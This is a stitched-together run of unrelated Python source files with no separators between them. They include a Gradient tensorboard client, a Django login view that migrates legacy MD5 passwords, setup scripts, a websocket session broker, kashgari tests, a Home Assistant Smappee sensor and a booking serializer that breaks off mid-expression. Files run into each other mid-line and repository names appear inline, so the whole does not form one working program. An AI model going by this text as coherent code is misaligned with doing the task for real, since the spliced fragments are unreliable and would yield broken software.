构建任务所属的job名 :param createdAt: (Optional) 构建任务创建时间 :param compilerType: (Optional) 构建类型 :param status: (Optional) 构建任务的运行状态 :param duration: (Optional) 构建任务运行时间 """ self.uuid = uuid self.jobName = jobName self.createdAt = createdAt self.compilerType = compilerType self.status = status self.duration = duration backend/isic/__init__.py from .isic_crawler import ISIC_getdata from knodle.trainer.config import TrainerConfig from knodle.trainer.baseline.majority import MajorityVoteTrainer, MajorityConfig from knodle.trainer.knn_aggregation.knn import KNNAggregationTrainer, KNNConfig from knodle.trainer.snorkel.snorkel import SnorkelKNNAggregationTrainer, SnorkelTrainer, SnorkelConfig, SnorkelKNNConfig from knodle.trainer.wscrossweigh.wscrossweigh import WSCrossWeighTrainer, WSCrossWeighConfig from knodle.trainer.auto_trainer import AutoTrainer from knodle.trainer.auto_config import AutoConfigfrom django.forms import ModelForm from .models import Message class MessageCreateForm(ModelForm): class Meta: model = Message fields = ['text'] gradient/api_sdk/clients/tensorboards_client.py """ Tensorboard logic related client handler. Remember that in code snippets all highlighted lines are required other lines are optional. """ from .base_client import BaseClient from .. import repositories, models class TensorboardClient(BaseClient): """ Client to handle tensorboard related actions. How to create instance of tensorboard client: .. code-block:: python :linenos: :emphasize-lines: 4 from gradient import TensorboardClient tb_client = TensorboardClient( api_key='your_api_key_here' ) """ def create( self, image=None, username=None, password=None, instance_type=None, instance_size=None, instances_count=None, experiments=None, ): """ Method to create tensorboard in paperspace gradient. Example create tensorboard: .. code-block:: python :linenos: :emphasize-lines: 2 tb_id = tb_client.create( experiments=['some_experiment_id'], image='tensorflow/tensorflow:latest-py3', username='your_username', password='', instance_type='cpu', instance_size='small', instance_count=1 ) :param str image: your tensorboard will run with this image. By default it will be run with ``tensorflow/tensorflow:latest-py3`` :param str username: if you wish to limit access to your tensorboard with base auth then provide username :param str password: if you wish to limit access to your tensorboard with base auth then provide password :param str instance_type: type of instance on which you want to run tensorboard. Available choices: .. code-block:: cpu gpu By default we use ``cpu`` instance type. :param str instance_size: size of instance on which you want to run tensorboard. Available choices: .. code-block:: small medium large By default we use ``small`` instance size. :param int instances_count: on how many machines you want to run tensorboard. By default ``1`` is used. :param list experiments: list of experiments that you wish to add to tensorboard. To create tensorboard you need to provide at least one experiment id. This field is **required**. :return: Return tensorboard id :rtype: str :raises: ResourceFetchingError: When there is problem with response from API """ tensorboard = models.Tensorboard( image=image, username=username, password=password, instance=models.Instance( type=instance_type, size=instance_size, count=instances_count, ), experiments=experiments, ) repository = self.build_repository(repositories.CreateTensorboard) tensorboard_id = repository.create(tensorboard) return tensorboard_id def get(self, id): """ Method to get tensorboard details. Example get tensorboard details: .. code-block:: python :linenos: :emphasize-lines: 2 tb = tb_client.get( id='your_tb_id' ) :param str id: Tensorboard id of which you want to get details :return: Tensorbord object if found :rtype: None|Tensorboard :raises: ResourceFetchingError: When there is problem with response from API """ repository = self.build_repository(repositories.GetTensorboard) tensorboard = repository.get(id=id) return tensorboard def list(self): """ Method to list your active tensorboards. Example usage: .. code-block:: python :linenos: tb_list = tb_client.list() :return: list of active tensorboards :rtype: list[models.Tensorboard] :raises: ResourceFetchingError: When there is problem with response from API """ repository = self.build_repository(repositories.ListTensorboards) tensorboards = repository.list() return tensorboards def add_experiments(self, id, added_experiments): """ Method to add experiments to existing tensorboard. Example usage: .. code-block:: python :linenos: :emphasize-lines: 2, 3 tb = tb_client.add_experiments( id='your_tb_id', added_experiments=['new_experiment_id', 'next_new_experiment_id'] ) :param str id: tensorboard id to which you want to add experiments :param list added_experiments: list of experiment ids which you want to add to tensroboard :return: updated tensorboard :rtype: Tensorboard :raises: ResourceFetchingError: When there is problem with response from API """ repository = self.build_repository(repositories.UpdateTensorboard) tensorboard = repository.update( id=id, added_experiments=added_experiments) return tensorboard def remove_experiments(self, id, removed_experiments): """ Method to remove experiments from existing tensorboard. Example usage: .. code-block:: python :linenos: :emphasize-lines: 2, 3 tb = tb_client.remove_experiments( id='your_tb_id', removed_experiments=['experiment_id', 'next_experiment_id'] ) :param str id: tensorboard id from which you want to remove experiments :param list removed_experiments: list of experiment ids which you want to remove from tensroboard :return: updated tensorboard :rtype: Tensorboard :raises: ResourceFetchingError: When there is problem with response from API """ repository = self.build_repository(repositories.UpdateTensorboard) tensorboard = repository.update( id=id, removed_experiments=removed_experiments) return tensorboard def delete(self, id): """ Method to delete tensorboard. Example usage: .. code-block:: python :linenos: :emphasize-lines: 2 tb_client.delete( id='your_tb_id' ) :param str id: Tensoboard id which you want to delete """ repository = self.build_repository(repositories.DeleteTensorboard) repository.delete(id_=id) import time if __name__ == '__main__': s_time = time.time() for i in range(3): print("{:04d}".format(i+1)) time.sleep(1.0) e_time = time.time() print("--time: {:3.4f} [seconds]".format(e_time - s_time)) # Copyright (c) 2022, SK and Contributors # See license.txt # import frappe import unittest class TestMentor(unittest.TestCase): pass 1-10 from hashlib import md5 from django.conf import settings from django.contrib import messages from django.contrib.auth import ( authenticate, login as login_auth, views as authviews, ) from django.contrib.staticfiles.storage import staticfiles_storage from django.http import ( HttpResponseRedirect, HttpResponseServerError, ) from django.shortcuts import render from django.urls import reverse_lazy from django.utils import timezone from django.views.decorators.http import require_http_methods from ..forms.authentication import LoginForm, PasswordResetForm from ..forms.signup import SignUpForm from ..users import migrate_user, logout_user_without_losing_session @require_http_methods(["POST"]) def logout(request): referer = request.META.get("HTTP_REFERER", "/") logout_user_without_losing_session(request) return HttpResponseRedirect(referer) @require_http_methods(["POST"]) def login(request): """ Log user in from one of the two sources: * Normal Django's authentication framework * Legacy DDCZ database If user is able to log in from legacy database table and does not have corresponding user object, create it for him. After this version of the site will become the default one, also delete User's password from the legacy table and consider them "migrated". Note that it is unusal for this form to handle only POST data and creates a bit of a weird experience with the form--but given the form is present on each and every page, it feels better to do this than to feed this kind of POST handling to every view. """ referer = request.META.get("HTTP_REFERER", "/") form = LoginForm(request.POST) if not form.is_valid(): messages.error(request, f"Špatně vyplněný formulář: {form.errors.as_text()}") return HttpResponseRedirect(referer) from ddcz.models import UserProfile user = authenticate( username=form.cleaned_data["nick"], password=form.cleaned_data["password"] ) if user is not None: login_auth(request, user) user.profile.last_login = timezone.now() user.profile.save() return HttpResponseRedirect(referer) else: m = md5() # TODO: Encoding needs verification # This needs to be done since passwords, of course, can contain # non-ascii characters that affect hashing m.update(form.cleaned_data["password"].encode("cp1250")) old_insecure_hashed_password = m.hexdigest() try: profile = UserProfile.objects.get(nick=form.cleaned_data["nick"]) except UserProfile.DoesNotExist: messages.error(request, "Špatný nick a nebo heslo") return HttpResponseRedirect(referer) if profile.password_v1 != old_insecure_hashed_password: messages.error(request, "Špatný nick a nebo heslo") return HttpResponseRedirect(referer) else: migrate_user(profile=profile, password=form.cleaned_data["password"]) user = authenticate( username=form.cleaned_data["nick"], password=form.cleaned_data["password"], ) if not user: return HttpResponseServerError( "Chyba během migrace na nový systém! Prosím kontaktujte Almada" ) login_auth(request, user) # TODO: For first-time login, bunch of stuff happens. Inspect legacy login and reimplement return HttpResponseRedirect(referer) class PasswordResetView(authviews.PasswordResetView): template_name = "users/password-reset.html" success_url = reverse_lazy("ddcz:password-reset-done") from_email = settings.DDCZ_TRANSACTION_EMAIL_FROM email_template_name = "users/password-reset-email.html" form_class = PasswordResetForm class PasswordResetDoneView(authviews.PasswordResetDoneView): template_name = "users/password-reset-done.html" class PasswordResetConfirmView(authviews.PasswordResetConfirmView): template_name = "users/password-change.html" success_url = reverse_lazy("ddcz:password-change-done") class PasswordResetCompleteView(authviews.PasswordResetCompleteView): template_name = "users/password-change-done.html" def sign_up(request): form = SignUpForm() if request.method == "POST" and request.POST.get("submit"): form = SignUpForm(request.POST) if form.is_valid(): form.save() return render( request, "users/sign_up_after.html", {"addressing": form.cleaned_data["salutation"]}, ) return render( request, "users/sign_up.html", { "sign_up_form": form, "reg_script": staticfiles_storage.url("common/js/main.js"), "reg_style": staticfiles_storage.url("common/css/registration.css"), "seal_image": staticfiles_storage.url( "common/img/registration-seal-gold.svg" ), }, ) #!/usr/bin/env python from setuptools import setup, find_packages import dbbackup def get_requirements(): return open('requirements.txt').read().splitlines() def get_test_requirements(): return open('requirements-tests.txt').read().splitlines() keywords = [ 'django', 'database', 'media', 'backup', 'amazon', 's3' 'dropbox', ] setup( name='django-dbbackup', version=dbbackup.__version__, description=dbbackup.__doc__, author=dbbackup.__author__, author_email=dbbackup.__email__, install_requires=get_requirements(), tests_require=get_test_requirements(), license='BSD', url=dbbackup.__url__, keywords=keywords, packages=find_packages(), classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Environment :: Console', 'Framework :: Django', 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Topic :: Database', 'Topic :: System :: Archiving', 'Topic :: System :: Archiving :: Backup', 'Topic :: System :: Archiving :: Compression' ], ) from .tag.temperature import TemperatureTag, TemperatureTagException from .tag.humidity import HumidityTag, HumidityTagException from .tag.barometer import BarometerTag, BarometerTagException from .tag.lux_meter import LuxMeterTag, LuxMeterTagException class ClimateModuleException(Exception): pass class ClimateModule: def __init__(self, bm): self._bm = bm self._temperature_tag = TemperatureTag(bm, bus=0, address=0x48) self._humidity_tag = HumidityTag(bm, bus=0, address=0x40) self._barometer_tag = BarometerTag(bm, bus=0, address=0x60) self._lux_meter_tag = LuxMeterTag(bm, bus=0, address=0x44) def measure(self): try: temperature = self._temperature_tag.measure() except TemperatureTagException: raise ClimateModuleException try: humidity = self._humidity_tag.measure()[0] except HumidityTagException: raise ClimateModuleException try: pressure, altitude = self._barometer_tag.measure() except BarometerTagException: raise ClimateModuleException try: illuminance = self._lux_meter_tag.measure() except LuxMeterTagException: raise ClimateModuleException return { 'temperature': temperature, 'humidity': humidity, 'pressure': pressure, 'altitude': altitude, 'illuminance': illuminance } ratnania/mlhiphymlhiphy/__init__.py __version__ = "0.1" from mlhiphy import calculus from mlhiphy import kernels """ Contains the classes required to bind to client-server connection together to a client-server-server-client CCCSession. The CCC-Session allows for the clients to talk to each other in both directions """ from datetime import datetime from uuid import UUID from autobahn.asyncio.websocket import WebSocketServerProtocol import logutil import exception class SessionStore(object): """Singleton instance containing all sessions of the corresponding CCCServer""" __instance = None @staticmethod def instance(): """Creates the singleton instance if it does not yet exist and returns it""" if SessionStore.__instance is None: SessionStore.__instance = SessionStore() return SessionStore.__instance def __init__(self): self.session_dict = dict() self.log = logutil.get_logger(self) def add_connection(self, client_con, message): """ If no session for the given session id exits: Creates a new session and adds it to the dict. Calls the sessions addClientConnection() method to ask the session to add the connection """ parts = message.split(':') session_id = UUID(parts[0]) method = parts[1] self.log.info('Adding connection with method [{}] to session [{}]'.format(method, session_id)) session = self.session_dict.get(session_id) if session is None: session = CCCSession(session_id) self.session_dict[session_id] = session session.add_connection(client_con, method) return session def remove_session(self, session): """Removes this session from the running server""" if session.session_id in self.session_dict: del self.session_dict[session.session_id] self.log.info('Removed session [{}] from store'.format(session.session_id)) class SocketServerConnection(WebSocketServerProtocol): """Connection between the ccc_server and one chat client""" def __init__(self): super().__init__() self.enclosing_session = None self.client_adr = None self.log = logutil.get_logger(self) def onConnect(self, request): # pylint: disable=C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" self.client_adr = request.peer self.log.info("Client connecting: {0}".format(self.client_adr)) def onOpen(self): # pylint: disable=C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" pass def onMessage(self, payload, isBinary): # pylint: disable=C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" try: if isBinary: raise exception.CCCException("Received binary data - should only be text") message = payload.decode('utf8').strip() self.log.info('message received: ' + message) if (self.enclosing_session is None or not self.enclosing_session.is_cc_connected()): self.enclosing_session = SessionStore.instance().add_connection(self, message) else: response = self.enclosing_session.forward_message(self, message) if response is not None: self.send_text(response) except exception.Error504 as ex: # This client tried to connect to session with already established connection self.log.exception(str(ex)) self.send_text(str(ex)) self.close(CCCSession.CR_APP_PROTOCOLEXCEPTION) except Exception as ex: # pylint: disable=W0703 self.log.exception(ex) close_reason = CCCSession.CR_APP_PROTOCOLEXCEPTION if not isinstance(ex, exception.CCCException): close_reason = CCCSession.CR_APP_EXCEPTION if self.enclosing_session is not None: self.enclosing_session.close(close_reason, channel=self) def send_text(self, text): """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" payload = text.encode('utf8') self.sendMessage(payload, isBinary=False) def close(self, reason_code): """Closes this websocket and sets references to the socket to None""" self.enclosing_session = None reason_text = CCCSession.close_reasons[reason_code] self.sendClose(code=reason_code, reason=reason_text) def onClose(self, wasClean, code, reason): # pylint: disable=W0613, C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" if code is None or code < 3000: if reason is None: reason = CCCSession.close_reasons[CCCSession.CR_CHANNEL_CLOSE] if self.enclosing_session is not None: self.enclosing_session.channel_closed(self) else: reason = CCCSession.close_reasons[code] self.log.info("WebSocket connection to [{}] closed. Reason: {}".format(self.client_adr, reason)) class CCCSession(object): """ CCCSession represents a client client connection with brokering ccc_server in between. The session lives lives from the moment of the first connect of either app or gis to the moment of a connection close. Due to security considerations the session is only open a limited time to accept a handshaking connection of the later connecting client. """ #Close reasons (CR) why the session closes CR_APP_EXCEPTION = 3000 #General exception causing the session to close CR_APP_PROTOCOLEXCEPTION = 3010 #Exception in the application server was raised due to client protocol violation CR_CHANNEL_CLOSE = 1000 #The channel to either gis or app client was closed (externally) close_reasons = { CR_APP_EXCEPTION: 'General unexpected ccc server exception', CR_APP_PROTOCOLEXCEPTION: 'Severe violation of the protocoll through calling client', CR_CHANNEL_CLOSE: 'Channel to app or gis client was closed externally' } def __init__(self, session_id): self.session_id = session_id self.first_connect = None self.giscon = None self.appcon = None self.log = logutil.get_logger(self) def add_connection(self, client_con, method): """ Adds either a connection originating from the application or the gis client Aspekte: app oder gis schon verbunden oder nicht 'fehlerhandling' """ add_ok = False self.log.info('Adding connection to existing session [{}] by method [{}]'.format(self.session_id, method)) if method == 'appConnect': if self.appcon is None: self.appcon = client_con else: raise exception.Error504(self.session_id, 'app') elif method == 'gisConnect': if self.giscon is None: self.giscon = client_con add_ok = True else: raise exception.Error504(self.session_id, 'gis') else: raise exception.Error503() if self.is_cc_connected(): self._emit_ready() else: self.first_connect = datetime.now() def _emit_ready(self): """Sends the ready message to both clients""" msg = 'ready' self.appcon.send_text(msg) self.giscon.send_text(msg) def forward_message(self, source_con, message): """Forwards the message from ist source connection to the destination connection""" destination_con = self._other_channel(source_con) destination_con.send_text(message) return None def is_cc_connected(self): """ Returns true if the handshake between the connections is done, allowing the session to forward messages from one connection to the other """ gis_connected = self.giscon is not None app_connected = self.appcon is not None return gis_connected and app_connected def channel_closed(self, source_channel): """ Called from a channel's onClose method if the channel is the source of the close. After notifying the other channel, removes the channels from the session and the session from the session store. """ other = self._other_channel(source_channel) if other is not None: self._close_channel(other, CCCSession.CR_CHANNEL_CLOSE) self._destruct() def _destruct(self): """Removes the session from the store, removes the channels from the session""" SessionStore.instance().remove_session(self) self.giscon = None self.appcon = None def close(self, reason_code): """ Closes the connections of this session and removes the session from the session store """ reason = CCCSession.close_reasons[reason_code] self.log.info('Closing session due to reason: {}'.format(reason)) channels = [self.giscon, self.appcon] for channel in channels: if channel is not None: self._close_channel(channel, reason_code) self._destruct() def _other_channel(self, channel): """Returns the other channel. Example: If the gis channel is given as argument, the app channel is returned""" other_channel = None if channel is self.giscon: other_channel = self.appcon elif channel is self.appcon: other_channel = self.giscon else: raise exception.CCCException('Could not identify given channel') return other_channel def _channel_clienttype(self, channel): """Returns the name of the client type of the channel: gisclient or appclient""" channel_name = None if channel is self.giscon: channel_name = 'gisclient' elif channel is self.appcon: channel_name = 'appclient' else: raise exception.CCCException('Could not identify given channel') return channel_name def _close_channel(self, channel, reason_code): """Tries to close the given channel. Logs an exception if closing was not possible""" try: channel.close(reason_code) except Exception: # pylint: disable=W0703 reason_txt = CCCSession.close_reasons[reason_code] channel_name = self._channel_clienttype(channel) self.log.exception('Error sending close to {}. Close reason: {}'.format(channel_name, reason_txt)) # encoding: utf-8 # author: BrikerMan # contact: # blog: https://eliyar.biz # file: test_cnn_lstm_model.py # time: 2019-05-31 19:05 import os import tempfile import time import unittest import numpy as np from tensorflow.python.keras.utils import get_file import kashgari from kashgari.corpus import ChineseDailyNerCorpus from kashgari.embeddings import WordEmbedding from kashgari.macros import DATA_PATH from kashgari.tasks.labeling import CNN_LSTM_Model from tests.corpus import NERCorpus valid_x, valid_y = ChineseDailyNerCorpus.load_data('valid') sample_w2v_path = get_file('sample_w2v.txt', "http://s3.bmio.net/kashgari/sample_w2v.txt", cache_dir=DATA_PATH) class TestCNN_LSTM_Model(unittest.TestCase): @classmethod def setUpClass(cls): cls.model_class = CNN_LSTM_Model def test_basic_use_build(self): x, y = NERCorpus.load_corpus() model = self.model_class() model.fit(x, y, x, y, epochs=1) model.predict_entities(x[:5]) model.evaluate(x, y) res = model.predict(x[:20]) assert len(res) == min(len(x), 20) for i in range(5): assert len(res[i]) == min(model.embedding.sequence_length, len(x[i])) model_path = os.path.join(tempfile.gettempdir(), str(time.time())) model.save(model_path) pd_model_path = os.path.join(tempfile.gettempdir(), str(time.time())) kashgari.utils.convert_to_saved_model(model, pd_model_path) new_model = kashgari.utils.load_model(model_path) new_res = new_model.predict(x[:20]) assert np.array_equal(new_res, res) new_model.compile_model() model.fit(x, y, x, y, epochs=1) def test_fit_without_generator(self): x, y = NERCorpus.load_corpus('custom_2') model = self.model_class() model.fit_without_generator(x, y, x, y, epochs=2) def test_w2v_model(self): x, y = NERCorpus.load_corpus() w2v_embedding = WordEmbedding(sample_w2v_path, task=kashgari.LABELING) model = self.model_class(embedding=w2v_embedding) try: model.fit(x, y, x, y, epochs=1) model.evaluate(x, y) assert True except Exception as e: print(model.label2idx) raise e def test_variable_length_model(self): x, y = NERCorpus.load_corpus('custom_2') hyper_params = self.model_class.get_default_hyper_parameters() for layer, config in hyper_params.items(): for key, value in config.items(): if isinstance(value, int): hyper_params[layer][key] = value + 15 w2v_embedding_variable_len = WordEmbedding(sample_w2v_path, task=kashgari.LABELING, sequence_length='variable') model = self.model_class(embedding=w2v_embedding_variable_len, hyper_parameters=hyper_params) try: model.fit(x, y, epochs=1) model.evaluate(x, y) assert True except Exception as e: print(model.label2idx) raise e old_code/LGPSI_check.py #!/usr/bin/env python3 import codecs import collections import glob import re import unicodedata from normalise import convert c = collections.Counter() for FILENAME in glob.glob("src/*.md"): with codecs.open(FILENAME, "r", encoding="utf-8-sig") as f: for LINE_NUM, line in enumerate(f, 1): for TOKEN_NUM, token in enumerate(line.split(), 1): token = unicodedata.normalize("NFD", token) if token in ["#", "##"]: pass elif token == "...": pass elif re.match("[CDI]+", token): pass else: m = re.match(TOKEN_REGEX, token, re.VERBOSE) if m: word = unicodedata.normalize("NFC", m.groupdict()["word"]) if word == "ἀλλα": print(FILENAME, LINE_NUM, TOKEN_NUM, token, [hex(ord(ch)) for ch in token]) quit() c[word] += 1 else: print("INVALID TOKEN:") print(FILENAME, LINE_NUM, TOKEN_NUM, token, [hex(ord(ch)) for ch in token]) quit() for word, count in c.most_common(): norm, reasons = convert(word) # print(norm, word, reasons) if "ERROR" in reasons: print(' "' + word + '",') bin/get_server_channels.py import discord import json import sys client = discord.Client() @client.event async def on_ready(): server = client.get_server(sys.argv[1]) for channel in server.channels: print("%s: %s" % (channel.name, channel.id)) await client.logout() with open('keys/bot_token.json') as f: token = json.load(f)['token'] client.run(token) TakutoYoshikai/weasley-zoom from setuptools import setup, find_packages setup( name = 'weasley-zoom', version = '1.0.0', url = 'https://github.com/TakutoYoshikai/weasley-zoom.git', license = 'MIT LICENSE', author = '', author_email = '', description = 'This is a tool to close ZOOM window automatically at given time.', install_requires = ['setuptools', "pyautogui"], packages = find_packages(), entry_points={ "console_scripts": [ "weasley-zoom = weasley.weasley:main", ] } ) """Support for monitoring a Smappee energy sensor.""" from homeassistant.components.sensor import SensorEntity from homeassistant.const import DEVICE_CLASS_POWER, ENERGY_WATT_HOUR, POWER_WATT, VOLT from .const import DOMAIN TREND_SENSORS = { "total_power": [ "Total consumption - Active power", None, POWER_WATT, "total_power", DEVICE_CLASS_POWER, True, # both cloud and local ], "alwayson": [ "Always on - Active power", None, POWER_WATT, "alwayson", DEVICE_CLASS_POWER, False, # cloud only ], "power_today": [ "Total consumption - Today", "mdi:power-plug", ENERGY_WATT_HOUR, "power_today", None, False, # cloud only ], "power_current_hour": [ "Total consumption - Current hour", "mdi:power-plug", ENERGY_WATT_HOUR, "power_current_hour", None, False, # cloud only ], "power_last_5_minutes": [ "Total consumption - Last 5 minutes", "mdi:power-plug", ENERGY_WATT_HOUR, "power_last_5_minutes", None, False, # cloud only ], "alwayson_today": [ "Always on - Today", "mdi:sleep", ENERGY_WATT_HOUR, "alwayson_today", None, False, # cloud only ], } REACTIVE_SENSORS = { "total_reactive_power": [ "Total consumption - Reactive power", None, POWER_WATT, "total_reactive_power", DEVICE_CLASS_POWER, ] } SOLAR_SENSORS = { "solar_power": [ "Total production - Active power", None, POWER_WATT, "solar_power", DEVICE_CLASS_POWER, True, # both cloud and local ], "solar_today": [ "Total production - Today", "mdi:white-balance-sunny", ENERGY_WATT_HOUR, "solar_today", None, False, # cloud only ], "solar_current_hour": [ "Total production - Current hour", "mdi:white-balance-sunny", ENERGY_WATT_HOUR, "solar_current_hour", None, False, # cloud only ], } VOLTAGE_SENSORS = { "phase_voltages_a": [ "Phase voltages - A", "mdi:flash", VOLT, "phase_voltage_a", None, ["ONE", "TWO", "THREE_STAR", "THREE_DELTA"], ], "phase_voltages_b": [ "Phase voltages - B", "mdi:flash", VOLT, "phase_voltage_b", None, ["TWO", "THREE_STAR", "THREE_DELTA"], ], "phase_voltages_c": [ "Phase voltages - C", "mdi:flash", VOLT, "phase_voltage_c", None, ["THREE_STAR"], ], "line_voltages_a": [ "Line voltages - A", "mdi:flash", VOLT, "line_voltage_a", None, ["ONE", "TWO", "THREE_STAR", "THREE_DELTA"], ], "line_voltages_b": [ "Line voltages - B", "mdi:flash", VOLT, "line_voltage_b", None, ["TWO", "THREE_STAR", "THREE_DELTA"], ], "line_voltages_c": [ "Line voltages - C", "mdi:flash", VOLT, "line_voltage_c", None, ["THREE_STAR", "THREE_DELTA"], ], } async def async_setup_entry(hass, config_entry, async_add_entities): """Set up the Smappee sensor.""" smappee_base = hass.data[DOMAIN][config_entry.entry_id] entities = [] for service_location in smappee_base.smappee.service_locations.values(): # Add all basic sensors (realtime values and aggregators) # Some are available in local only env for sensor in TREND_SENSORS: if not service_location.local_polling or TREND_SENSORS[sensor][5]: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=sensor, attributes=TREND_SENSORS[sensor], ) ) if service_location.has_reactive_value: for reactive_sensor in REACTIVE_SENSORS: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=reactive_sensor, attributes=REACTIVE_SENSORS[reactive_sensor], ) ) # Add solar sensors (some are available in local only env) if service_location.has_solar_production: for sensor in SOLAR_SENSORS: if not service_location.local_polling or SOLAR_SENSORS[sensor][5]: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=sensor, attributes=SOLAR_SENSORS[sensor], ) ) # Add all CT measurements for measurement_id, measurement in service_location.measurements.items(): entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor="load", attributes=[ measurement.name, None, POWER_WATT, measurement_id, DEVICE_CLASS_POWER, ], ) ) # Add phase- and line voltages if available if service_location.has_voltage_values: for sensor_name, sensor in VOLTAGE_SENSORS.items(): if service_location.phase_type in sensor[5]: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=sensor_name, attributes=sensor, ) ) # Add Gas and Water sensors for sensor_id, sensor in service_location.sensors.items(): for channel in sensor.channels: gw_icon = "mdi:gas-cylinder" if channel.get("type") == "water": gw_icon = "mdi:water" entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor="sensor", attributes=[ channel.get("name"), gw_icon, channel.get("uom"), f"{sensor_id}-{channel.get('channel')}", None, ], ) ) async_add_entities(entities, True) class SmappeeSensor(SensorEntity): """Implementation of a Smappee sensor.""" def __init__(self, smappee_base, service_location, sensor, attributes): """Initialize the Smappee sensor.""" self._smappee_base = smappee_base self._service_location = service_location self._sensor = sensor self.data = None self._state = None self._name = attributes[0] self._icon = attributes[1] self._unit_of_measurement = attributes[2] self._sensor_id = attributes[3] self._device_class = attributes[4] @property def name(self): """Return the name for this sensor.""" if self._sensor in ["sensor", "load"]: return ( f"{self._service_location.service_location_name} - " f"{self._sensor.title()} - {self._name}" ) return f"{self._service_location.service_location_name} - {self._name}" @property def icon(self): """Icon to use in the frontend.""" return self._icon @property def state(self): """Return the state of the sensor.""" return self._state @property def device_class(self): """Return the class of this device, from component DEVICE_CLASSES.""" return self._device_class @property def unit_of_measurement(self): """Return the unit of measurement of this entity, if any.""" return self._unit_of_measurement @property def unique_id( self, ): """Return the unique ID for this sensor.""" if self._sensor in ["load", "sensor"]: return ( f"{self._service_location.device_serial_number}-" f"{self._service_location.service_location_id}-" f"{self._sensor}-{self._sensor_id}" ) return ( f"{self._service_location.device_serial_number}-" f"{self._service_location.service_location_id}-" f"{self._sensor}" ) @property def device_info(self): """Return the device info for this sensor.""" return { "identifiers": {(DOMAIN, self._service_location.device_serial_number)}, "name": self._service_location.service_location_name, "manufacturer": "Smappee", "model": self._service_location.device_model, "sw_version": self._service_location.firmware_version, } async def async_update(self): """Get the latest data from Smappee and update the state.""" await self._smappee_base.async_update() if self._sensor == "total_power": self._state = self._service_location.total_power elif self._sensor == "total_reactive_power": self._state = self._service_location.total_reactive_power elif self._sensor == "solar_power": self._state = self._service_location.solar_power elif self._sensor == "alwayson": self._state = self._service_location.alwayson elif self._sensor in [ "phase_voltages_a", "phase_voltages_b", "phase_voltages_c", ]: phase_voltages = self._service_location.phase_voltages if phase_voltages is not None: if self._sensor == "phase_voltages_a": self._state = phase_voltages[0] elif self._sensor == "phase_voltages_b": self._state = phase_voltages[1] elif self._sensor == "phase_voltages_c": self._state = phase_voltages[2] elif self._sensor in ["line_voltages_a", "line_voltages_b", "line_voltages_c"]: line_voltages = self._service_location.line_voltages if line_voltages is not None: if self._sensor == "line_voltages_a": self._state = line_voltages[0] elif self._sensor == "line_voltages_b": self._state = line_voltages[1] elif self._sensor == "line_voltages_c": self._state = line_voltages[2] elif self._sensor in [ "power_today", "power_current_hour", "power_last_5_minutes", "solar_today", "solar_current_hour", "alwayson_today", ]: trend_value = self._service_location.aggregated_values.get(self._sensor) self._state = round(trend_value) if trend_value is not None else None elif self._sensor == "load": self._state = self._service_location.measurements.get( self._sensor_id ).active_total elif self._sensor == "sensor": sensor_id, channel_id = self._sensor_id.split("-") sensor = self._service_location.sensors.get(int(sensor_id)) for channel in sensor.channels: if channel.get("channel") == int(channel_id): self._state = channel.get("value_today") from django.conf import settings from django.core.exceptions import ObjectDoesNotExist from rest_framework import serializers from rest_framework.exceptions import ValidationError from bookings.models import Booking from gtfs.models import Departure, RiderCategory, Route def get_object_by_api_id(qs, api_id): try: return qs.get(api_id=api_id) except ObjectDoesNotExist: raise ValidationError( f'Invalid ID "{api_id}" - object does not exist.', code="does_not_exist" ) class TicketSerializer(serializers.Serializer): ticket_type_id = serializers.UUIDField() customer_type_id = serializers.UUIDField() def validate_ticket_type_id(self, value): if "route" not in self.parent.parent.context: return None self.context["fare"] = get_object_by_api_id( self.parent.parent.context["route"].fares.all(), value ) return self.context["fare"] def validate_customer_type_id(self, value): if "fare" not in self.context: return return get_object_by_api_id( RiderCategory.objects.filter(fares=self.context["fare"]), value, ) def validate(self, data): data["fare"] = data.pop("ticket_type_id", None) data["fare_rider_category"] = data.pop("customer_type_id", None) return data class PassthroughParametersSerializer(serializers.Serializer): request_id = serializers.CharField(required=False, allow_blank=True) transaction_id = serializers.CharField( required=False, max_length=255, write_only=True, allow_blank=True ) locale = serializers.ChoiceField(choices=settings.TICKET_LANGUAGES, required=False) class BookingSerializer(PassthroughParametersSerializer, serializers.ModelSerializer): route_id = serializers.UUIDField(required=False, write_only=True) departure_ids = serializers.ListField( child=serializers.UUIDField(), required=False, allow_empty=False, write_only=True, ) tickets = TicketSerializer(many=True, write_only=True) locale = serializers.ChoiceField( choices=settings.TICKET_LANGUAGES, required=False, write_only=True ) id = serializers.UUIDField(source="api_id", read_only=True) class Meta: model = Booking fields = ( "route_id", "departure_ids", "tickets", "locale", "id", "status", "request_id", "transaction_id", ) read_only_fields = ("id", "status") def validate_route_id(self, value): self.context["route"] = get_object_by_api_id( Route.objects.for_maas_operator(self.context["request"].user.maas_operator), value, ) return self.context["route"] def validate_departure_ids(self, values): departures = [ get_object_by_api_id( Departure.objects.for_maas_operator( self.context["request"].user.maas_operator ), departure_id, ) for departure_id in values ] if "route" not in self.context: self.context["route"] = departures[0].trip.route if not all(d.trip.route == self.context["route"] for d in departures): raise ValidationError( "All departures must belong to the same route.", code="invalid_departures", ) if self.context["route"].capacity_sales in ( Route.CapacitySales.REQUIRED_FOR_OUTBOUND, Route.CapacitySales.REQUIRED_FOR_INBOUND, ): required_direction_id = ( 0 if self.context["route"].capacity_sales == Route.CapacitySales.REQUIRED_FOR_OUTBOUND else 1 ) if ( len(departures) != 1 or 